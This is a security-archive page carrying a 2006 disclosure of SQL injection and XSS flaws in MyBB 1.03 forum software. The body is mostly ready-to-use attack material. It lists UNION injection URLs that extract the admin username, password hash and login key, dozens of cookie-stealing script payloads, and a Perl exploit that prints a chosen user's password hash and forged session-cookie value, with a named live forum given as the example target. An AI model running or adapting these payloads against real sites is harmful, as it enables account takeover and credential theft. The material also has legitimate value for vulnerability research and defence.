MyBB-1.03.txt

MyBB-1.03.txt: Posted Feb 14, 2006; Authored by HACKERS PAL; MyBB 1.03 suffers from multiple SQL injection vulnerabilities. POC included.; tags | exploit, vulnerability, sql injection; SHA-256 | 3250723929f4f892ca5103634e9526bb328af14b440cef3affc11ab7bae31b85; Download | Favorite | View
MyBB-1.03.txt

Multible Injections in MyBB 1.03

All injections and vulnerabilities discovered by : HACKERS PAL

two days ago i thought to download  the new Mybb forum new version files .. and there were the desaster

there is many xss and sql injections in the new protected version ...

and i made a exploit which get the table prefix and give you the admin information and the cookie which you should make value ..

the mods forum is injected with all the vulnerabilities but the main forum and some of od versions are not

url : http://mods.mybboard.com/forum/index.php

0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0

SQL injections
in misc.php

Get The Admin username
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*

Get The Admin password
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*

Get The Loginkey
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*

in private.php

private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*

after adding the values click on [Or Select a Buddy:] options on the first one you will find the user name for the admin and in the second will be the password and the third for the loginkey

in showteam.php
user name
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*

password
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*

loginkey
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*

in usercp.php
user name
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*

user password
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*

user loginkey
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*
----------------------------------------------------
xss injections

in any file in the forum like forumdisplay.php?fid=1


after the link

add
&"></a><script>alert(document.cookie);</script>&


-----------------------------------------------------
if the forum is closed
global.php?bbclosedwarning=<script>alert(document.cookie);</script>

in index.php
index.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script>

in calender.php
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&events=<script>alert(document.cookie);</script>
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&bdaylist=<script>alert(document.cookie);</script>
calendar.php?action=editevent&eid=1&GLOBALS[]=1&yearopts=<script>alert(document.cookie);</script>

in editpost.php
editpost.php?pid=1&GLOBALS[]=1&attachments=<script>alert(document.cookie);</script>

in forumdisplay.php
forumdisplay.php?fid=1&GLOBALS[]=1&modlist=<script>alert(document.cookie);</script>
forumdisplay.php?fid=1&GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script>

this vulnerabilities works only if the forum were threads forum
forumdisplay.php?fid=2&GLOBALS[]=1&announcements=<script>alert(document.cookie);</script>
forumdisplay.php?fid=2&GLOBALS[]=1&threads=<script>alert(document.cookie);</script>

in memberlist.php
memberlist.php?GLOBALS[]=1&member=<script>alert(document.cookie);</script>

in misc.php
misc.php?action=help&GLOBALS[]=1&sections=<script>alert(document.cookie);</script>
misc.php?action=whoposted&GLOBALS[]=1&whoposted=<script>alert(document.cookie);</script>
misc.php?action=smilies&GLOBALS[]=1&smilies=<script>alert(document.cookie);</script>

in online.php
online.php?action=today&GLOBALS[]=1&todayrows=<script>alert(document.cookie);</script>

in portal.php
portal.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script>
portal.php?GLOBALS[]=1&threadlist=<script>alert(document.cookie);</script>
portal.php?GLOBALS[]=1&announcements=<script>alert(document.cookie);</script>

in private.php
private.php?GLOBALS[]=1&messagelist=<script>alert(document.cookie);</script>
private.php?action=tracking&GLOBALS[]=1&readmessages=<script>alert(document.cookie);</script>
private.php?action=tracking&GLOBALS[]=1&unreadmessages=<script>alert(document.cookie);</script>
private.php?action=folders&GLOBALS[]=1&folderlist=<script>alert(document.cookie);</script>
private.php?action=folders&GLOBALS[]=1&newfolders=<script>alert(document.cookie);</script>

in showteam.php
showteam.php?GLOBALS[]=1&usergrouprows=<script>alert(document.cookie);</script>
showteam.php?GLOBALS[]=1&usergroups=<script>alert(document.cookie);</script>

in showthread.php
showthread.php?tid=1&GLOBALS[]=1&posts=<script>alert(document.cookie);</script>

if there is a poll in the thread
showthread.php?tid=1&GLOBALS[]=1&polloptions=<script>alert(document.cookie);</script>

in stats.php
stats.php?GLOBALS[]=1&mostreplies=<script>alert(document.cookie);</script>

in usercp.php
usercp.php?action=profile&GLOBALS[]=1&bdaydaysel=<script>alert(document.cookie);</script>
usercp.php?action=profile&GLOBALS[]=1&returndatesel=<script>alert(document.cookie);</script>
usercp.php?action=profile&GLOBALS[]=1&select=<script>alert(document.cookie);</script>
usercp.php?action=profile&GLOBALS[]=1&requiredfields=<script>alert(document.cookie);</script>
usercp.php?action=profile&GLOBALS[]=1&customfields=<script>alert(document.cookie);</script>
usercp.php?action=options&GLOBALS[]=1&langoptions=<script>alert(document.cookie);</script>
usercp.php?action=options&GLOBALS[]=1&tppoptions=<script>alert(document.cookie);</script>
usercp.php?action=options&GLOBALS[]=1&pppoptions=<script>alert(document.cookie);</script>
usercp.php?action=favorites&GLOBALS[]=1&threads=<script>alert(document.cookie);</script>
usercp.php?action=favorites&GLOBALS[]=1&folder="><script>alert(document.cookie);</script>
usercp.php?action=subscriptions&GLOBALS[]=1&threads=<script>alert(document.cookie);</script>
usercp.php?action=subscriptions&GLOBALS[]=1&folder=<script>alert(document.cookie);</script>
usercp.php?action=subscriptions&GLOBALS[]=1&forumsubscriptions=<script>alert(document.cookie);</script>
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forumsubscriptions=<script>alert(document.cookie);</script>
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forums=<script>alert(document.cookie);</script>
usercp.php?action=avatar&GLOBALS[]=1&galleries=<script>alert(document.cookie);</script>
usercp.php?action=editlists&GLOBALS[]=1&buddylist=<script>alert(document.cookie);</script>
usercp.php?action=editlists&GLOBALS[]=1&ignorelist=<script>alert(document.cookie);</script>
usercp.php?action=editlists&GLOBALS[]=1&newlist=<script>alert(document.cookie);</script>
usercp.php?action=drafts&GLOBALS[]=1&drafts=<script>alert(document.cookie);</script>
usercp.php?action=usergroups&GLOBALS[]=1&groupsledlist=<script>alert(document.cookie);</script>
usercp.php?action=usergroups&GLOBALS[]=1&joinablegrouplist=<script>alert(document.cookie);</script>

-----------------------------------------

--- The Exploit ---

#!/bin/env perl
#//-------------------------------------------------------------#
#//     MyBB Forum SQL Injection Exploit .. By HACKERS PAL      #
#//     Greets For Devil-00 - Abducter - Almaster - GaCkeR      #
#//   Special Greets For SG (SecurityGurus) Team And Members    #
#//                    http://WwW.SoQoR.NeT                     #
#//-------------------------------------------------------------#

use LWP::Simple;
print "\n#####################################################";
print "\n#        MyBB Forum Exploit By : HACKERS PAL        #";
print "\n#               Http://WwW.SoQoR.NeT                #";
if(!$ARGV[0] or !$ARGV[1]) {
print "\n# -- Usage:                                         #";
print "\n# -- perl $0 [Full-Path] [User ID]             #";
print "\n# -- Example:                                       #";
print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";
print "\n#     Greets To Devil-00 - Abducter - GaCkeR        #";
print "\n#####################################################";
    exit(0);
}
else
{
print "\n#     Greets To Devil-00 - Abducter - GaCkeR        #";
print "\n#####################################################";
        $web=$ARGV[0];
        $id=$ARGV[1];
$url = "showteam.php?GLOBALS[]=1&comma=/*";
            $site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/FROM (.*)users u WHERE/;
 $prefix=$1;
if(!$1)
       {
$prefix="mybb_";
       }
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix."users%20where%20uid=$id/*";
            $site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
print "\n[+] Table Prefix is : $prefix";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix."users%20where%20uid=$id/*";
            $site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";
die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);
   print"\n[!] Watch out ... The Cookie Value is comming\n";
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix."users%20where%20uid=$id/*";
            $site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";
print "[-] Unable to retrieve Login Key\n" if(!$1);
}

# WwW.SoQoR.NeT
Top Authors In Last 30 Days

Red Hat 172 files
Ubuntu 47 files
Debian 22 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
tmrswrr 4 files
E1.Coders 4 files
File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other
MyBB-1.03.txt

MyBB-1.03.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

MyBB-1.03.txt

Share This

MyBB-1.03.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems
